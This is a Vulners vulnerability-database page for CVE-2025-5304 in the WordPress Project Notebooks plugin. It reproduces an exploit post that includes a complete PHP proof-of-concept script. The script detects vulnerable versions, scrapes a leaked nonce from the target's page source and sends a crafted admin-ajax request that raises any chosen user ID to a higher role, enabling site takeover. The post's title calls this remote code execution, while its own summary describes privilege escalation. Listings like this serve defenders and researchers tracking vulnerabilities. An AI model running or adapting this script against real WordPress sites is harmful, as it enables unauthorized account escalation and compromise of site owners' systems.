Vulners
Lucene search
📄 WordPress Project Notebooks 1.1.4 Remote Code Execution
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for Missing Authorization in Ptoffice Pt_Project_Notebooks | 27 Sep 202502:19 | – | githubexploit |
 | CVE-2025-5304 | 28 Jun 202505:51 | – | circl |
 | WordPress plugin PT Project Notebooks 安全漏洞 | 28 Jun 202500:00 | – | cnnvd |
 | CVE-2025-5304 | 28 Jun 202505:29 | – | cve |
 | CVE-2025-5304 PT Project Notebooks 1.0.0 - 1.1.3 - Missing Authorization to Unauthenticated Privilege Escalation via wpnb_pto_new_users_add Function | 28 Jun 202505:29 | – | cvelist |
 | EUVD-2025-19577 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-5304 | 28 Jun 202506:15 | – | nvd |
 | CVE-2025-5304 | 28 Jun 202506:15 | – | osv |
 | WordPress PT Project Notebooks plugin 1.0.0-1.1.3 - Missing Authorization to Unauthenticated Privilege Escalation vulnerability | 27 Jun 202523:09 | – | patchstack |
 | PT-2025-27288 · WordPress · Pt Project Notebooks | 28 Jun 202500:00 | – | ptsecurity |
10
=============================================================================================================================================
| # Title : WordPress Project Notebooks Plugin 1.1.4 – RCE vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/209970/ & CVE-2025-5304
[+] Summary
A rce vulnerability exists in the Project Notebooks WordPress plugin prior to version 1.1.4,
allowing unauthenticated or low‑privileged attackers to escalate any WordPress user to higher roles,
including administrator, through improper validation of AJAX actions and nonce exposure.
This vulnerability is actively exploitable when the plugin leaks a valid nonce value and the AJAX
handler wpnb_pto_new_users_add fails to fully verify user capability requirements
[+] Vulnerability Details
The plugin exposes internal configuration objects (including nonce and ajax_url) directly in the HTML source.
An attacker can extract this nonce and send a crafted request to : wp-admin/admin-ajax.php?action=wpnb_pto_new_users_add
The handler then accepts user IDs (ids) and privilege levels (user_type) without validating whether the requester has enough permissions.
This enables:
Unauthorized user privilege escalation
Unauthorized role assignment
Full WordPress takeover if executed against an administrator ID
[+] poc
Run using: php poc.php -u http://target.com -id 28 -c "wordpress_logged_in=COOKIE_VALUE"
<?php
// PoC (CVE-2025-5304)
// By Indoushka
function nxploited_headers($cookie = null) {
$agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
"Mozilla/5.0 (X11; Linux x86_64) Nxploited",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
"Nxploited/1.0 (compatible;)",
"Nxploited/2.0 (Special Edition)",
"Mozilla/5.0 Nxploited"
];
$headers = [
"User-Agent: " . $agents[array_rand($agents)] . " | Nxploited",
"X-Nxploited: Nxploited"
];
if ($cookie) {
$headers[] = "Cookie: $cookie";
}
return $headers;
}
function nxploited_normalize_url($url) {
$url = trim($url);
if (!preg_match('#^https?://#i', $url)) {
$url = "http://" . $url;
}
return rtrim($url, "/");
}
function nxploited_fetch_version($base_url, $cookie = null, $timeout = 12) {
$readme_url = $base_url . "/wp-content/plugins/project-notebooks/readme.txt";
$ch = curl_init($readme_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
$text = curl_exec($ch);
curl_close($ch);
if (preg_match('/Stable\s*tag:\s*([0-9][0-9.\-a-zA-Z]*)/i', $text, $m)) {
$version = trim($m[1]);
echo "[+] Nxploited: Detected version from readme.txt → $version\n";
return [$version, true];
}
echo "[-] Nxploited: Could not parse version from $readme_url\n";
return [null, false];
}
function nxploited_is_vulnerable($version) {
$vulnerable_versions = ["1.1.3","1.1.2","1.1.1","1.1.0","1.0.9","1.0.8","1.0.7","1.0.6","1.0.5","1.0.4","1.0.3","1.0.2","1.0.1","1.0.0"];
return in_array($version, $vulnerable_versions);
}
function nxploited_extract_nonce_ajax($base_url, $cookie = null, $timeout = 12) {
$ch = curl_init($base_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
$html = curl_exec($ch);
curl_close($ch);
preg_match('/"nonce"\s*:\s*"([^"]+)"/', $html, $m_nonce);
preg_match('/"ajax_url"\s*:\s*"([^"]+)"/', $html, $m_ajax);
$nonce = $m_nonce[1] ?? null;
$ajax_url = isset($m_ajax[1]) ? str_replace("\\/", "/", $m_ajax[1]) : $base_url . "/wp-admin/admin-ajax.php";
if ($nonce) echo "[+] Nxploited: Nonce found: $nonce\n";
else echo "[-] Nxploited: Nonce not found in page source.\n";
echo "[+] Nxploited: AJAX URL: $ajax_url\n";
return [$nonce, $ajax_url];
}
function nxploited_exploit($ajax_url, $uid, $nonce, $cookie = null, $timeout = 12) {
$data = [
"action" => "wpnb_pto_new_users_add",
"nonce" => $nonce,
"ids" => (string)$uid,
"user_type" => "2",
"Nxploited" => "Nxploited"
];
echo "[*] Nxploited: Exploiting… wait 3 seconds.\n";
sleep(3);
$ch = curl_init($ajax_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, nxploited_headers($cookie));
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
$body = curl_exec($ch);
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[+] Nxploited: HTTP $status\n";
echo substr($body, 0, 1500) . "\n";
return [$status, $body];
}
// ------------------------
// Main Execution
// ------------------------
$options = getopt("u:id:c:", ["url:", "id:", "cookie:", "skip-version"]);
$base_url = nxploited_normalize_url($options['u'] ?? $options['url']);
$uid = $options['id'] ?? $options['id'];
$cookie = $options['c'] ?? $options['cookie'] ?? null;
if (!isset($options['skip-version'])) {
list($detected_version, $ok) = nxploited_fetch_version($base_url, $cookie);
if ($detected_version) {
$vuln = nxploited_is_vulnerable($detected_version);
$state = $vuln ? "vulnerable" : "not confirmed vulnerable";
echo "[+] Nxploited: Version $detected_version → $state\n";
} else {
echo "[!] Nxploited: Proceeding without confirmed version (use --skip-version to suppress).\n";
}
}
list($nonce, $ajax_url) = nxploited_extract_nonce_ajax($base_url, $cookie);
if (!$nonce) die("[!] Nxploited: Abort: nonce not found.\n");
if (isset($detected_version)) echo "[i] Nxploited: Target version during exploitation → $detected_version\n";
list($status, $body) = nxploited_exploit($ajax_url, $uid, $nonce, $cookie);
if (!$status) exit(2);
if (strpos($body, "Busted!") !== false) {
die("[!] Nxploited: Server replied 'Busted!' (nonce/session mismatch). Use correct cookie.\n");
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.19.8
EPSS0.01278
SSVC